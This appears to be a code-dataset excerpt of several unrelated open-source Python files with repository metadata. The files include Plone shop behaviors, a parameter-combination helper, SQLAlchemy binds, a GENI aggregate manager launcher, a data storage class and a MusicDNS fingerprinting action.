global_overbook_text = schema.Text(
title=_(
u"label_item_global_overbook_notification_text",
default=u"Additional overall notification text for the order "
u"confirmation mail of this item ordered if out of stock"
),
required=False
)
@adapter(IItemNotificationTextBehavior)
class DXItemNotificationText(BubbleItemNotificationText):
"""Accessor Interface
"""
@property
def order_text(self):
if self.context.order_text:
return self.context.order_text
return super(DXItemNotificationText, self).order_text
@property
def overbook_text(self):
if self.context.overbook_text:
return self.context.overbook_text
return super(DXItemNotificationText, self).overbook_text
@adapter(IGlobalNotificationTextBehavior)
class DXGlobalNotificationText(BubbleGlobalNotificationText):
"""Accessor Interface
"""
@property
def global_order_text(self):
if self.context.global_order_text:
return self.context.global_order_text
return super(DXGlobalNotificationText, self).global_order_text
@property
def global_overbook_text(self):
if self.context.global_overbook_text:
return self.context.global_overbook_text
return super(DXGlobalNotificationText, self).global_overbook_text
@provider(IFormFieldProvider)
class IBuyablePeriodBehavior(model.Schema):
"""Buyable period behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'buyable_effective',
'buyable_expires'
]
)
buyable_effective = schema.Datetime(
title=_(u'label_buyable_effective_date',
default=u'Buyable effective date'),
required=False
)
buyable_expires = schema.Datetime(
title=_(u'label_buyable_expiration_date',
default=u'Buyable expiration date'),
required=False
)
@implementer(IBuyablePeriod)
@adapter(IBuyablePeriodBehavior)
class DXBuyablePeriod(object):
def __init__(self, context):
self.context = context
@property
def effective(self):
return self.context.buyable_effective
@property
def expires(self):
return self.context.buyable_expires
@provider(IFormFieldProvider)
class ITradingBehavior(model.Schema):
"""Trading behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'item_number',
'gtin',
]
)
item_number = schema.TextLine(
title=_(u'label_item_number', default=u'Item number'),
description=_(u'help_item_number',
default=u'Buyable Item number'),
required=False)
gtin = schema.TextLine(
title=_(u'label_gtin', default=u'GTIN'),
description=_(u'help_gtin',
default=u'Global Trade Item Number'),
required=False)
@implementer(ITrading)
@adapter(ITradingBehavior)
class DXTrading(object):
def __init__(self, context):
self.context = context
@property
def item_number(self):
return self.context.item_number
@property
def gtin(self):
return self.context.gtin
| bsd-3-clause | 5,413,968,990,627,828,000 | 26.651206 | 81 | 0.653784 | false |
drix00/pymcxray | pymcxray/multipleloop.py | 1 | 3786 | #!/usr/bin/env python
"""
This module provides a tool for handling computer experiments with
of a set of input parameters, where each input parameter
is varied in a prescribed fashion.
In short, the parameters are held in a dictionary where the keys are
the names of the parameters and the values are the numerical, string
or other values of the parameters. The value can take on multiple
values: e.g., an integer parameter 'a' can have values -1, 1 and
10. Similarly, a string parameter 'method' can have values 'Newton'
and 'Bisection'. The module will generate all combination of all
parameters and values, which in the mentioned example will be
(-1, 'Newton'), (1, 'Newton'), (10, 'Newton'), (-1, 'Bisection'),
(1, 'Bisection'), and (10, 'Bisection'). Particular combination
of values can easily be removed.
The usage and implementation of the module are documented in the
book "Python Scripting for Computational Science" (H. P. Langtangen,
Springer, 2009), Chapter 12.1.
"""
# see also http://pyslice.sourceforge.net/HomePage
def _outer(a, b):
"""
Return the outer product/combination of two lists.
a is a multi- or one-dimensional list,
b is a one-dimensional list, tuple, NumPy array or scalar (new parameter)
Return: outer combination 'all_combination'.
The function is to be called repeatedly::
all = _outer(all, p)
"""
all_combination = []
if not isinstance(a, list):
raise TypeError('a must be a list')
if isinstance(b, (float,int,complex,str)): b = [b] # scalar?
if len(a) == 0:
# first call:
for j in b:
all_combination.append([j])
else:
for j in b:
for i in a:
if not isinstance(i, list):
raise TypeError('a must be list of list')
# note: i refers to a list; i.append(j) changes
# the underlying list (in a), which is not what
# we want, we need a copy, extend the copy, and
# add to all_combination
k = i + [j] # extend previous prms with new one
all_combination.append(k)
return all_combination
def combine(prm_values):
"""
Compute the combination of all parameter values in the prm_values
(nested) list. Main function in this module.
param prm_values: nested list ``(parameter_name, list_of_parameter_values)``
or dictionary ``prm_values[parameter_name] = list_of_parameter_values``.
return: (all, names, varied) where
- all contains all combinations (experiments)
all[i] is the list of individual parameter values in
experiment no i
- names contains a list of all parameter names
- varied holds a list of parameter names that are varied
(i.e. where there is more than one value of the parameter,
the rest of the parameters have fixed values)
Code example:
>>> dx = array([1.0/2**k for k in range(2,5)])
>>> dt = 3*dx; dt = dt[:-1]
>>> p = {'dx': dx, 'dt': dt}
>>> p
{'dt': [ 0.75 , 0.375,], 'dx': [ 0.25 , 0.125 , 0.0625,]}
>>> all, names, varied = combine(p)
>>> all
[[0.75, 0.25], [0.375, 0.25], [0.75, 0.125], [0.375, 0.125],
[0.75, 0.0625], [0.375, 0.0625]]
"""
if isinstance(prm_values, dict):
# turn dict into list [(name,values),(name,values),...]:
prm_values = [(name, prm_values[name]) \
for name in prm_values]
all_combination = []
varied = []
for name, values in prm_values:
all_combination = _outer(all_combination, values)
if isinstance(values, list) and len(values) > 1:
varied.append(name)
names = [name for name, values in prm_values]
return all_combination, names, varied
| apache-2.0 | -5,109,418,296,811,559,000 | 36.86 | 80 | 0.622557 | false |
oas89/iktomi | iktomi/db/sqla/__init__.py | 1 | 1417 | # -*- coding: utf-8 -*-
import logging
from importlib import import_module
from sqlalchemy import orm, create_engine
from sqlalchemy.orm.query import Query
def multidb_binds(databases, package=None, engine_params=None):
'''Creates dictionary to be passed as `binds` parameter to
`sqlalchemy.orm.sessionmaker()` from dictionary mapping models module name
to connection URI that should be used for these models. Models module must
have `metadata` attribute. `package` when set must be a package or package
name for all models modules.'''
engine_params = engine_params or {}
if not (package is None or isinstance(package, basestring)):
package = getattr(package, '__package__', None) or package.__name__
binds = {}
for ref, uri in databases.items():
md_ref = '.'.join(filter(None, [package, ref]))
md_module = import_module(md_ref)
try:
metadata = md_module.metadata
except AttributeError:
raise ImportError(
'Cannot import name metadata from module {}'.format(md_ref))
engine = create_engine(uri, **engine_params)
# Dot before [name] is required to allow setting logging level etc. for
# all them at once.
engine.logger = logging.getLogger('sqlalchemy.engine.[%s]' % ref)
for table in metadata.sorted_tables:
binds[table] = engine
return binds
| mit | -3,956,359,092,296,895,000 | 41.939394 | 79 | 0.661962 | false |
plantigrade/geni-tools | src/gcf-am.py | 1 | 9684 | #!/usr/bin/env python
#----------------------------------------------------------------------
# Copyright (c) 2012-2015 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
#----------------------------------------------------------------------
"""
Framework to run a GENI Aggregate Manager. See geni/am for the
Reference Aggregate Manager that this runs.
Run with "-h" flag to see usage and command line options.
"""
import sys
# Check python version. Requires 2.6 or greater, but less than 3.
if sys.version_info < (2, 6):
raise Exception('Must use python 2.6 or greater.')
elif sys.version_info >= (3,):
raise Exception('Not python 3 ready')
import logging
import optparse
import os
from gcf import geni
import gcf.geni.am
import gcf.geni.am.am2
import gcf.geni.am.am3
from gcf.geni.config import read_config
from gcf.geni.auth.util import getInstanceFromClassname
def parse_args(argv):
parser = optparse.OptionParser()
parser.add_option("-k", "--keyfile",
help="AM key file name", metavar="FILE")
parser.add_option("-g", "--certfile",
help="AM certificate file name (PEM format)", metavar="FILE")
parser.add_option("-c", "--configfile", help="config file path", metavar="FILE")
# Note: The trusted CH certificates are _not_ enough here.
# It needs self signed certificates. EG CA certificates.
parser.add_option("-r", "--rootcadir",
help="Trusted Root certificates directory (files in PEM format)", metavar="FILE")
# Could try to determine the real IP Address instead of the loopback
# using socket.gethostbyname(socket.gethostname())
parser.add_option("-H", "--host",
help="server ip", metavar="HOST")
parser.add_option("-p", "--port", type=int,
help="server port", metavar="PORT")
parser.add_option("--debug", action="store_true", default=False,
help="enable debugging output")
parser.add_option("-V", "--api-version", type=int,
help="AM API Version", default=2)
parser.add_option("-D", "--delegate", metavar="DELEGATE",
help="Classname of aggregate delegate to instantiate (if none, reference implementation is used)")
return parser.parse_args()
def getAbsPath(path):
"""Return None or a normalized absolute path version of the argument string.
Does not check that the path exists."""
if path is None:
return None
if path.strip() == "":
return None
path = os.path.normcase(os.path.expanduser(path))
if os.path.isabs(path):
return path
else:
return os.path.abspath(path)
def main(argv=None):
if argv is None:
argv = sys.argv
opts = parse_args(argv)[0]
level = logging.INFO
if opts.debug:
level = logging.DEBUG
logging.basicConfig(level=level)
# Read in config file options, command line gets priority
optspath = None
if not opts.configfile is None:
optspath = os.path.expanduser(opts.configfile)
config = read_config(optspath)
for (key,val) in config['aggregate_manager'].items():
if hasattr(opts,key) and getattr(opts,key) is None:
setattr(opts,key,val)
if not hasattr(opts,key):
setattr(opts,key,val)
if getattr(opts,'rootcadir') is None:
setattr(opts,'rootcadir',config['global']['rootcadir'])
if opts.rootcadir is None:
sys.exit('Missing path to trusted root certificate directory (-r argument)')
certfile = getAbsPath(opts.certfile)
keyfile = getAbsPath(opts.keyfile)
if not os.path.exists(certfile):
sys.exit("Aggregate certfile %s doesn't exist" % certfile)
if not os.path.getsize(certfile) > 0:
sys.exit("Aggregate certfile %s is empty" % certfile)
if not os.path.exists(keyfile):
sys.exit("Aggregate keyfile %s doesn't exist" % keyfile)
if not os.path.getsize(keyfile) > 0:
sys.exit("Aggregate keyfile %s is empty" % keyfile)
# Instantiate an argument guard that will reject or modify
# arguments and options provided to calls
argument_guard = None
if hasattr(opts, 'argument_guard'):
argument_guard = getInstanceFromClassname(opts.argument_guard)
# Instantiate authorizer from 'authorizer' config argument
# By default, use the SFA authorizer
if hasattr(opts, 'authorizer'):
authorizer_classname = opts.authorizer
else:
authorizer_classname = "gcf.geni.auth.sfa_authorizer.SFA_Authorizer"
authorizer = getInstanceFromClassname(authorizer_classname,
getAbsPath(opts.rootcadir), opts, argument_guard)
# Use XMLRPC authorizer if opt.remote_authorizer is set
if hasattr(opts, 'remote_authorizer'):
import xmlrpclib
authorizer = xmlrpclib.Server(opts.remote_authorizer)
# Instantiate resource manager from 'authorizer_resource_manager'
# config argument. Default = None
resource_manager = None
if hasattr(opts, 'authorizer_resource_manager'):
resource_manager = \
getInstanceFromClassname(opts.authorizer_resource_manager)
delegate=None
if hasattr(opts, 'delegate') and opts.delegate is not None and str(opts.delegate).strip() != "":
try:
delegate = getInstanceFromClassname(opts.delegate,
getAbsPath(opts.rootcadir),
config['global']['base_name'],
"https://%s:%d/" % (opts.host, int(opts.port)),
**vars(opts)
)
except AttributeError, e:
msg = "Could not create delegate from name '%s': probably not a valid python class name. " % opts.delegate
msg += e.message
logging.getLogger('gcf-am').error(msg)
sys.exit(msg)
# here rootcadir is supposed to be a single file with multiple
# certs possibly concatenated together
comboCertsFile = geni.CredentialVerifier.getCAsFileFromDir(getAbsPath(opts.rootcadir))
if opts.api_version == 1:
# rootcadir is dir of multiple certificates
delegate = geni.ReferenceAggregateManager(getAbsPath(opts.rootcadir))
ams = geni.AggregateManagerServer((opts.host, int(opts.port)),
delegate=delegate,
keyfile=keyfile,
certfile=certfile,
ca_certs=comboCertsFile,
base_name=config['global']['base_name'])
elif opts.api_version == 2:
ams = gcf.geni.am.am2.AggregateManagerServer((opts.host, int(opts.port)),
keyfile=keyfile,
certfile=certfile,
trust_roots_dir=getAbsPath(opts.rootcadir),
ca_certs=comboCertsFile,
base_name=config['global']['base_name'],
authorizer=authorizer,
resource_manager=resource_manager,
delegate=delegate)
elif opts.api_version == 3:
ams = gcf.geni.am.am3.AggregateManagerServer((opts.host, int(opts.port)),
keyfile=keyfile,
certfile=certfile,
trust_roots_dir=getAbsPath(opts.rootcadir),
ca_certs=comboCertsFile,
base_name=config['global']['base_name'],
authorizer=authorizer,
resource_manager=resource_manager,
delegate=delegate)
else:
msg = "Unknown API version: %d. Valid choices are \"1\", \"2\", or \"3\""
sys.exit(msg % (opts.api_version))
logging.getLogger('gcf-am').info('GENI AM (v%s) Listening on port %s...' % (opts.api_version, opts.port))
ams.serve_forever()
if __name__ == "__main__":
sys.exit(main())
| mit | 8,550,566,515,008,584,000 | 44.679245 | 120 | 0.573627 | false |
vkuznet/rep | rep/data/storage.py | 1 | 5284 | """
This is wrapper for pandas.DataFrame, which allows you to define dataset for estimator in a simple way.
"""
from __future__ import division, print_function, absolute_import
import numbers
from numpy.random.mtrand import RandomState
import pandas
import numpy
from sklearn.utils import check_random_state
from ..utils import get_columns_dict, get_columns_in_df
# generating random seeds in the interval [0, RANDINT)
RANDINT = 10000000
class LabeledDataStorage(object):
"""
This class implements interface of data for estimators training. It contains data, labels and weights -
all information to train model.
Parameters:
-----------
:param pandas.DataFrame ds: data
:param target: labels for classification and values for regression (set None for predict methods)
:type target: None or numbers.Number or array-like
:param sample_weight: weight (set None for predict methods)
:type sample_weight: None or numbers.Number or array-like
:param random_state: for pseudo random generator
:type random_state: None or int or RandomState
:param bool shuffle: shuffle or not data
"""
def __init__(self, data, target=None, sample_weight=None, random_state=None, shuffle=False):
self.data = data
self.target = self._get_key(self.data, target)
self.sample_weight = self._get_key(self.data, sample_weight, allow_nones=True)
assert len(self.data) == len(self.target), 'ERROR: Lengths are different for data and target'
if self.sample_weight is not None:
assert len(self.data) == len(self.sample_weight), 'ERROR: Lengths are different for data and sample_weight'
self._random_state = check_random_state(random_state).randint(RANDINT)
self.shuffle = shuffle
self._indices = None
def _get_key(self, ds, key, allow_nones=False):
"""
Get data from ds by key
:param pandas.DataFrame ds: data
:param key: what data get from ds
:type key: None or numbers.Number or array-like
:return: key data
"""
if isinstance(key, str) and ds is not None:
# assert key in set(ds.columns), self._print_err('ERROR:', '%s is absent in data storage' % key)
name = list(get_columns_dict([key]).keys())[0]
return numpy.array(get_columns_in_df(self.data, [key])[name])
elif isinstance(key, numbers.Number):
return numpy.array([key] * len(ds))
else:
if not allow_nones:
return numpy.array(key) if key is not None else numpy.ones(len(ds))
else:
return numpy.array(key) if key is not None else key
def __len__(self):
"""
:return: count of rows in storage
:rtype: int
"""
return len(self.data)
def get_data(self, features=None):
"""
Get data for estimator
:param features: set of feature names (if None then use all features in data storage)
:type features: None or list[str]
:rtype: pandas.DataFrame
"""
df = get_columns_in_df(self.data, features)
if self.shuffle:
return df.irow(self.get_indices())
return df
def get_targets(self):
"""
Get sample targets for estimator
:rtype: numpy.array
"""
if self.shuffle:
return self.target[self.get_indices()]
return self.target
def get_weights(self, allow_nones=False):
"""
Get sample weights for estimator
:rtype: numpy.array
"""
if self.sample_weight is None:
if allow_nones:
return self.sample_weight
else:
return numpy.ones(len(self.data))
else:
if self.shuffle:
return self.sample_weight[self.get_indices()]
return self.sample_weight
def get_indices(self):
"""
Get data indices
:rtype: numpy.array
"""
if self._indices is None:
rs = RandomState(seed=self._random_state)
self._indices = rs.permutation(len(self))
return self._indices
def col(self, index):
"""
Get necessary columns
:param index: names
:type index: None or str or list(str)
:rtype: pandas.Series or pandas.DataFrame
"""
if isinstance(index, str):
name = list(get_columns_dict([index]).keys())[0]
return self.get_data([index])[name]
return self.get_data(index)
def eval_column(self, expression):
"""
Evaluate some expression to get necessary data
:type expression: numbers.Number or array-like or str or function(pandas.DataFrame)
:rtype: numpy.array
"""
if isinstance(expression, numbers.Number):
return numpy.zeros(len(self), dtype=type(expression)) + expression
elif isinstance(expression, str):
return numpy.array(self.col(expression))
elif hasattr(expression, '__call__'):
return numpy.array(expression(self.get_data()))
else:
assert len(expression) == len(self), 'Different length'
return numpy.array(expression)
| apache-2.0 | -9,111,050,701,465,696,000 | 32.656051 | 119 | 0.609008 | false |
JustinTulloss/harmonize.fm | fileprocess/fileprocess/actions/puidgenerator.py | 1 | 1905 | import logging
import os
import subprocess
from baseaction import BaseAction
from fileprocess.processingthread import na
from fileprocess.configuration import config
try:
import musicdns
except ImportError:
musicdns = None
import fileprocess
log = logging.getLogger(__name__)
class PuidGenerator(BaseAction):
def __init__(self, *args, **kwargs):
global musicdns
super(PuidGenerator, self).__init__(*args, **kwargs)
if musicdns:
musicdns.initialize()
def can_skip(self, new_file):
if new_file.get('puid'):
return True
else:
return False
def process(self, file):
global musicdns
if not musicdns:
return file
if file.get('puid'):
return file
if not file.has_key('fname'):
return file
if not os.path.exists(file['fname']):
return file
try:
fp = musicdns.create_fingerprint(file['fname'])
puid = musicdns.lookup_fingerprint(fp[0], fp[1], config['musicdns.key'])
except Exception, e:
log.warn("Could not fingerprint %s: %s", file['fname'], e)
return file #We don't need the fingerprint per say
log.debug('%s has puid %s', file.get('title'), puid)
if puid != None:
file['puid'] = puid
return file
else:
# Spin off a process to do the analysis, we don't care if it
# succeeds or fails, we're just helping out MusicDNS
try:
gp = subprocess.Popen(
['genpuid', config['musicdns.key'], '-xml',
os.path.abspath(file['fname'])],
stdout=open('/dev/null')
)
except Exception, e:
log.info("Could not generate puid: %s", e)
return file
| mit | -1,684,215,555,034,553,600 | 27.863636 | 84 | 0.548556 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.